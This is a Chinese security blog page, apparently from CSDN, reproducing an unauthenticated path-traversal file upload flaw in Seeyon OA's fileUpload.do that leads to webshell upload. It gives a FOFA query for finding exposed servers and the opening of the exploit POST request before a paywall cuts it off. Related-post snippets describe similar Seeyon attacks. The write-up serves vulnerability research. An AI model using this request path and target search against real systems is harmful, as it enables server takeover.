【漏洞复现】致远互联OA fileUpload.do 任意文件上传漏洞

最新推荐文章于 2025-04-02 08:47:02 发布

从不学安全

最新推荐文章于 2025-04-02 08:47:02 发布

阅读量1.2k

点赞数 4

分类专栏：漏洞复现文章标签：安全网络

本文链接：https://blog.csdn.net/qq_67810151/article/details/137559833

版权

漏洞复现专栏收录该内容

99 篇文章 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

本文详细介绍了致远互联OA办公协同管理软件的fileUpload.do接口存在的文件上传漏洞，包括漏洞概述、复现过程及影响范围。攻击者可利用此漏洞进行webshell上传，获取服务器权限。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

0x01 产品简介

致远互联OA是一套办公协同管理软件，主要面向政府行业和中小企业，提供信息化解决方案。

0x02 漏洞概述

致远互联OA fileUpload.do接口处存在文件上传漏洞，未经身份验证的远程攻击者可通过目录遍历的方式绕过上传接口限制，并利用menu.do接口替换上传文件的fileid值实现webshell上传到服务器，获取服务器权限。

0x03 测绘语句

fofa: title="协同管理软件 V5.6SP1"

0x04 漏洞复现

POST /seeyon/autoinstall.do/../../seeyon/fileUpload.do?method=processUpload HTTP/1.1

Host:

Content-Type: multipart/form-data; boundary=00content0boundary00



--00content0boundary00

Content-Disposition: form-data; name="type"





--00content0boundary00

Content-

了解本专栏

订阅专栏解锁全文

超级会员免费看

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

从不学安全

关注关注

4
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

订阅专栏

致远互联-OA前台fileUpload.do存在任意文件上传（含批量验证poc）

weixin_43567873的博客

04-28

507

致远互联-OA前台fileUpload.do存在任意文件上传（含批量验证poc）

致远OA fileUpload.do 前台文件上传绕过漏洞复现(XVE-2024-8166)

0xSec

04-08

3057

致远互联-OA 接口 fileUpload.do 接口处存在文件上传漏洞，未经身份验证的远程攻击者可通过目录遍历的方式绕过上传接口限制，并利用menu.do接口替换上传文件的fileid值实现webshell上传到服务器，获取服务器权限，控制整个 web 服务器。

参与评论您还未登录，请先登录后发表或查看评论

最新致远OA文件上传漏洞深度分析与扩展

qq_63217130的博客

08-14

1028

加微信即可加入WingBy交流群（不存在娱乐化）一个可以交流CTF、WEB、内网、免杀、红队、蓝队、java/php代码审计、逆向、云安全、CNVD、证书挖掘的交流群..........

致远互联FE协作办公平台 apprvaddNew.jsp SQL注入漏洞(CVE-2025-2030)

热门推荐

今天是几号的博客

03-21

1万+

由于致远OA旧版本某些接口存在未授权访问，以及部分函数存在过滤不足，攻击者通过构造恶意请求，可在无需登录的情况下上传恶意脚本文件，从而控制服务器。致远A8+协同管理软件V7.0、V7.0sp1、V7.0sp2、V7.0sp3。致远OA A6、A8、A8N (V8.0SP2，V8.1，V8.1SP1)致远OA V7.0、V7.0SP1、V7.0SP2、V7.0SP3。致远OA G6、G6N (V8.1、V8.1SP1)。致远OA V6.0、V6.1SP1、V6.1SP2。致远OA V7.1、V7.1SP1。

致远互联 OA fileUpload.do 文件上传漏洞

wan___she__pi的博客

04-26

1367

致远OA是一款企业级办公自动化软件，提供了办公流程管理、文档管理、协同办公、知识管理等功能。它可以帮助企业实现信息化办公，提高工作效率和协同能力。致远OA是fileUpload.do存在文件上传漏洞。

【漏洞复现】致远OA-任意文件上传-fileUpload

知黑而守白

04-10

431

致远OA是一款企业级办公自动化软件，提供了办公流程管理、文档管理、协同办公、知识管理等功能。它可以帮助企业实现信息化办公，提高工作效率和协同能力。致远OA具有灵活的流程设计和定制能力，可以根据企业的需求进行个性化配置。同时，它还支持移动办公，可以在手机、平板等设备上进行办公操作。致远OA已经在各行各业得到广泛应用，成为许多企业的重要办公工具之一。

【漏洞复现】致远OA fileUpload.do 前台文件上传绕过漏洞

m0_46381222的博客

10-23

603

【漏洞复现】致远OA fileUpload.do 前台文件上传绕过漏洞

致远OA任意文件上传

xxx9686的博客

09-21

1417

2）通过上传一个压缩文件，调用接口进行文件在解压时会利用解压过程的漏洞利用获取webshell。1）通过请求直接获取管理员权限cookie。

致远漏洞（登陆绕过+任意文件上传）

bring_coco的博客

07-10

3511

1.获得cookie每次请求都会得到一个cookie值，都可以用，如下：失败的cookie如下：2.上传zip文件注意这里zip文件直接burp右键paste from file放进去即可这里压缩文件如上3.解压压缩文件可以看到报错找不到指定文件，是因为我们压缩包中没有带layout.xml，其必须存在否则在利用解压漏洞时会解压失败空内容即可注意上传目录：然后我重新生成zip文件再次解压，但是访问不到，应该这里有问题因为解压出来的目录都为空，直接用下面脚本吧。

致远OA wpsAssistServlet接口存在任意文件上传漏洞

weixin_44304678的博客

11-02

790

致远OA互联新一代智慧型协同运营平台以中台的架构和技术、协同、业务、连接、数据的专业能力，夯实协同运营中台的落地效果；在协同运营平台全面升级的基础上，V8.0深耕大型企业管理模式、运营机制，进一步强化“协同”在管理中的价值，推动大中型企业、集团企业、国资以及高新技术企业的管理模式升级，帮助企业构筑全程、全域、全端的运营和服务能力，提升人员效率和组织绩效，赋能企业数字化、智能化发展。作者对使用该文章导致的任何直接或间接损失不承担任何责任。该文章仅用于授权测试,任何未经授权的测试均属于非法行为。

致远OA wpsAssistServlet 任意文件上传漏洞

故事讲予风听

11-17

1175

致远OA互联新一代智慧型协同运营平台以中台的架构和技术、协同、业务、连接、数据的专业能力，夯实协同运营中台的落地效果；以移动化、AI智能推进前台的应用创新，实现企业轻量化、智能化业务场景，促进企业全过程管理能效，赋予企业协同工作和运营管理的新体验。

致远oa wpsassistservlet任意文件上传漏洞

计算机毕业论文源码，学生个人网页制作html源码。贴近用户做网络推广和互联网优化。

09-29

2320

致远OA是一款流行的协同管理软件，在各中、大型企业机构中广泛使用。致远oa wpsassistservlet漏洞由于致远OA旧版本某些接口能被未授权访问，并且部分函数存在过滤不足，攻击者通过构造恶意请求，权限绕过漏洞，可在无需登录的情况下上传恶意脚本文件，从而控制getshell。致远oa wpsassistservlet漏洞影响范围，致远oa wpsassistservlet漏洞漏洞检测测试POC：http://1.2.3.4:80/seeyon/thirdpartyController.do.css/

【漏洞复现】致远OA wpsAssistServlet接口存在任意文件上传漏洞

失心少年

11-18

539

在协同运营平台全面升级的基础上，V8.0深耕大型企业管理模式、运营机制，进一步强化“协同”在管理中的价值，推动大中型企业、集团企业、国资以及高新技术企业的管理模式升级，帮助企业构筑全程、全域、全端的运营和服务能力，提升人员效率和组织绩效，赋能企业数字化、智能化发展。本文所提供的工具仅用于学习，禁止用于其他！漏洞链接：https://127.0.0.1/seeyon/wpsAssistServlet?

致远OA wpsAssistServlet 任意文件上传漏洞漏洞复现

Boom！脑洞大爆炸的博客

11-11

5224

致远OA wpsAssistServlet 任意文件上传漏洞漏洞复现